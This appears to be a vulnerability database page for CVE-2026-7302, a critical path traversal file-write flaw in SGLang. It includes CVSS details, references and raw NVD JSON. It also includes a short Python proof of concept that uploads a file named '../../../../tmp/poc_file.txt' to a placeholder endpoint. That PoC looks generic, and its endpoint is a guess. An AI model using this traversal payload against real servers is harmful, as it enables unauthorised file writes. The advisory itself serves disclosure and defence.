CVE-2026-7302

Description

SGLangs multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lmsys:sglang:0.5.10:-:*:*:*:*:*:* - VULNERABLE

SGLangs (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-ip:port/api/upload"

# Malicious filename containing path traversal sequences
# This attempts to write a file to the /tmp/ directory
malicious_filename = "../../../../tmp/poc_file.txt"

# File content to be written
file_content = "This file was written by CVE-2026-7302 PoC."

# Constructing the multipart form data
files = {
    'file': (malicious_filename, file_content)
}

try:
    response = requests.post(target_url, files=files)
    if response.status_code == 200:
        print(f"[+] Exploit successful! Server responded with status {response.status_code}")
        print(f"[+] Check /tmp/poc_file.txt on the target server.")
    else:
        print(f"[-] Exploit failed. Server responded with status {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7302
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7302
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7302/
[4] VulDB https://vuldb.com/cve/CVE-2026-7302
[5] https://antiproof.ai/blog/three-rces-in-sglang/
[6] https://github.com/sgl-project/sglang/tree/main/python/sglang

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7302", "sourceIdentifier": "[email protected]", "published": "2026-05-18T12:16:16.600", "lastModified": "2026-05-19T13:43:48.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SGLangs multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lmsys:sglang:0.5.10:-:*:*:*:*:*:*", "matchCriteriaId": "E0022BC8-935B-474C-AD8D-B01417AC7092"}]}]}], "references": [{"url": "https://antiproof.ai/blog/three-rces-in-sglang/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://github.com/sgl-project/sglang/tree/main/python/sglang", "source": "[email protected]", "tags": ["Product"]}]}}